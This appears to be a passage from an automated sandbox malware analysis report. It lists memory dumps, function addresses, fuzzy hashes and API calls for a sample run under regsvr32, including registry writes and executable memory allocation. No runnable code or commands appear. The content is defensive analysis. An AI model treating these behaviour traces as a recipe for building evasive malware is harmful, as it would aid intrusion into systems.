                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d57a398fa13efdc8df233538f0cd81fe3e3bb24426d25ef52964593492f5def1
                                                                  • Instruction ID: b336b09ee131423c6e85b5563b785c105dde9ee2dbba2b6257dde936cd80e02e
                                                                  • Opcode Fuzzy Hash: d57a398fa13efdc8df233538f0cd81fe3e3bb24426d25ef52964593492f5def1
                                                                  • Instruction Fuzzy Hash: 6AC1AB73B049258BDB248D2988D46A973E7FBC6348B2F8235D96AE7E45D530DC4687C0
                                                                  Function 6C860250 Relevance: .3, Instructions: 295COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b43d758f956380e17e0ea8bdc4eaeabb30f3746df891c799236fb4b9d83c82c
                                                                  • Instruction ID: e03789eee5ef33bb7d66ec8d7636b52145f7521e060346bdf6c63235570fd78a
                                                                  • Opcode Fuzzy Hash: 8b43d758f956380e17e0ea8bdc4eaeabb30f3746df891c799236fb4b9d83c82c
                                                                  • Instruction Fuzzy Hash: 64B10471E157158FDB12DE7EC882269F7F1AF9A240F50C72AE821B7B22D731A8818754
                                                                  Function 04F9F0A4 Relevance: .3, Instructions: 283COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                                  • Instruction ID: 6d2e832f0cb2e69ba9f163e96da8fc90a4999a4e2344a7e6039c5a4fd27456cf
                                                                  • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                                  • Instruction Fuzzy Hash: D9A12E31508A4C8FDB55EF28C889BEAB7F5FB58315F10466EE84AC7160EB30E645CB81
                                                                  Function 6C8808D0 Relevance: .2, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb46d79dae15c942d667b557196e484b81de2d22df671f1988f90bb148d79945
                                                                  • Instruction ID: b984a832ba0502f764e09349d50b2ca26040872501f17a295e3105b4e5ac7e32
                                                                  • Opcode Fuzzy Hash: fb46d79dae15c942d667b557196e484b81de2d22df671f1988f90bb148d79945
                                                                  • Instruction Fuzzy Hash: B5713831F061694FDB34CE98C8D07AEB7A2BB89308F098939D855ABB41D7B56D4487C0
                                                                  Function 6C85ECF0 Relevance: .2, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: de312ee73e1e2adf0f8bebf661d28d6d06a9755f07752b9532fd994750b8078b
                                                                  • Instruction ID: dd895e23a3eb849988d3a51bf932e035fdffc5d24f5cb2cd1a41755c05e13e3c
                                                                  • Opcode Fuzzy Hash: de312ee73e1e2adf0f8bebf661d28d6d06a9755f07752b9532fd994750b8078b
                                                                  • Instruction Fuzzy Hash: C4A14AB2A087119BD304DF69C89079FF7E2AFC8314F1AC93DE8D997244D774A8419B82
                                                                  Function 6C8E983E Relevance: .2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94eba6d781ebc1c1d7c47eb575eef4d2e1e786fb3627b677d46712156f41787e
                                                                  • Instruction ID: bf7bc2b66cc4521358f0fb8e44228f5689d25dea7a8a70cecfca252b09825013
                                                                  • Opcode Fuzzy Hash: 94eba6d781ebc1c1d7c47eb575eef4d2e1e786fb3627b677d46712156f41787e
                                                                  • Instruction Fuzzy Hash: 57714AB1D052B48FDB188FA884E02FDBFF1AF4E304F194A6ED4656B782C2B54505CBA0
                                                                  Function 6C85E7C0 Relevance: .2, Instructions: 203COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16680fe2527dd008dab47f0d0a31f9962e1fa7f62734803eb83872ffad3b7a24
                                                                  • Instruction ID: 12f55eace831e89479368bbe66a1df39b96eb763b5e6bdf2c986447106a3ca94
                                                                  • Opcode Fuzzy Hash: 16680fe2527dd008dab47f0d0a31f9962e1fa7f62734803eb83872ffad3b7a24
                                                                  • Instruction Fuzzy Hash: 30812A72E083119BD308CF65C89075FF7E2EFC8714F5AC93EA89997244D7B4D8419A82
                                                                  Function 6C85EA60 Relevance: .2, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 420d36a4ea2870a3c0e647c5f9c196378d914757c0c4666ce4e9ffb5a7371a06
                                                                  • Instruction ID: dbf0f18baa36bc0b697f0b6f8cbb0ffa3b90436902238c396795baa3370bd58c
                                                                  • Opcode Fuzzy Hash: 420d36a4ea2870a3c0e647c5f9c196378d914757c0c4666ce4e9ffb5a7371a06
                                                                  • Instruction Fuzzy Hash: 2E810872E083159BD308CF65C89079FF7E2AFC8714F5AC93EB89997244D7B4D8419A82
                                                                  Function 6C89EE00 Relevance: .2, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c9de16f4954e8af8e564267b53219a02c31ce2d6b72e34f73b91563588eb583
                                                                  • Instruction ID: 73087d1546b6f97fa29430602bb6fdbe74f74ab0b21d1b0a1d2c75d20ecf06d3
                                                                  • Opcode Fuzzy Hash: 1c9de16f4954e8af8e564267b53219a02c31ce2d6b72e34f73b91563588eb583
                                                                  • Instruction Fuzzy Hash: CD51C3316052018FD724CE1DC6C0B9ABBA1FF89318F148ABDDD5A8BB55EB31A845C7C1
                                                                  Function 6C942994 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 761526eb16a9fecece05c1d8f18392742579a54206e6b5a52a43904422d3fe76
                                                                  • Instruction ID: 9906e89dfe735f3cc0331a29d617fb64b017cb3e691bb9f309d89fc2b8a941de
                                                                  • Opcode Fuzzy Hash: 761526eb16a9fecece05c1d8f18392742579a54206e6b5a52a43904422d3fe76
                                                                  • Instruction Fuzzy Hash: F5315E75B183164BD30CCE3DE994A5BB7D3ABC8610F05CA3DB985C3788DA30DC0A8692
                                                                  Function 6C943860 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 339COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8FE
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D903
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D908
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D90D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID: @
                                                                  • API String ID: 4206212132-2766056989
                                                                  • Opcode ID: 7b6a53d1aaa988504b4b9512edd5e02bec40b6afb7733d98d21be32dd2d56591
                                                                  • Instruction ID: d1efdbc09a3b9b77615f2a8dd2abb84be1cac987aa0be2708cee5b6d7e2c6c49
                                                                  • Opcode Fuzzy Hash: 7b6a53d1aaa988504b4b9512edd5e02bec40b6afb7733d98d21be32dd2d56591
                                                                  • Instruction Fuzzy Hash: 2EB114766093298FD710CE3CD494359F7E6BB85318F09C6AED99497B91D335E808C781
                                                                  Function 6C943530 Relevance: 40.7, APIs: 27, Instructions: 162COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 346ed67f86ca77db754b8ff293cdafe38839864ce3485ef0f306bf9ef41f5d01
                                                                  • Instruction ID: cc88bdb1642de57f344a224e0b6c5226e894bc0cfd72c6975d48d15148dbb72b
                                                                  • Opcode Fuzzy Hash: 346ed67f86ca77db754b8ff293cdafe38839864ce3485ef0f306bf9ef41f5d01
                                                                  • Instruction Fuzzy Hash: E251BE71A093869FE715CF3AC081726BBE4BF85328F18C69DD9994BB51C335E845CB81
                                                                  Function 6C9436C0 Relevance: 39.1, APIs: 26, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8F9
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8FE
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D903
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D908
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D90D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  • Opcode ID: 02e3fa1f6f04c225c8bba10b1fb910da49bf9270e79760ced16625e116d2958a
                                                                  • Instruction ID: 56d17b2d3f203784a1c7f9e81bc9967af4336b9858939d9d706989608890f36e
                                                                  • Opcode Fuzzy Hash: 02e3fa1f6f04c225c8bba10b1fb910da49bf9270e79760ced16625e116d2958a
                                                                  • Instruction Fuzzy Hash: BA3103B56097099FC300CF79D49135AB7EABB86B54F40C52AE6A487B52D338E818CB51
                                                                  Function 026354D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 263registrymemorysleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,02647584,00000000,00020019,?), ref: 02635517
                                                                  • _memset.LIBCMT ref: 02635558
                                                                  • VirtualAlloc.KERNEL32(00000000,0264BF98,00003000,00000040), ref: 02635596
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026355C1
                                                                  • VirtualFree.KERNEL32(0264C7D4,00000000,00008000), ref: 02635615
                                                                  • _memset.LIBCMT ref: 02635679
                                                                  • _memset.LIBCMT ref: 0263569D
                                                                  • _memset.LIBCMT ref: 026356AF
                                                                  • VirtualAlloc.KERNEL32(00000000,0264BF98,00003000,00000040), ref: 02635736
                                                                  • RegCreateKeyW.ADVAPI32(80000001,02647584,?), ref: 026357A9
                                                                  • RegDeleteValueW.ADVAPI32(?,02647500), ref: 026357BC
                                                                  • RegSetValueExW.ADVAPI32(?,02647500,00000000,00000003,00000000,00000065), ref: 026357D4
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026357DE
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0263580E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$Virtual$AllocCloseValue$CreateDeleteFreeOpenSleep
                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                  • API String ID: 2494566644-159827627
                                                                  • Opcode ID: cf9dbd235df04f6506127272d1b0e8df6090b4df9b7f10edcc6bfe3cb23d38a5
                                                                  • Instruction ID: 1db91eb8142087d0e7e2c0590433a2a22a0fcad73e2c23c270f0e350f50013b9
                                                                  • Opcode Fuzzy Hash: cf9dbd235df04f6506127272d1b0e8df6090b4df9b7f10edcc6bfe3cb23d38a5
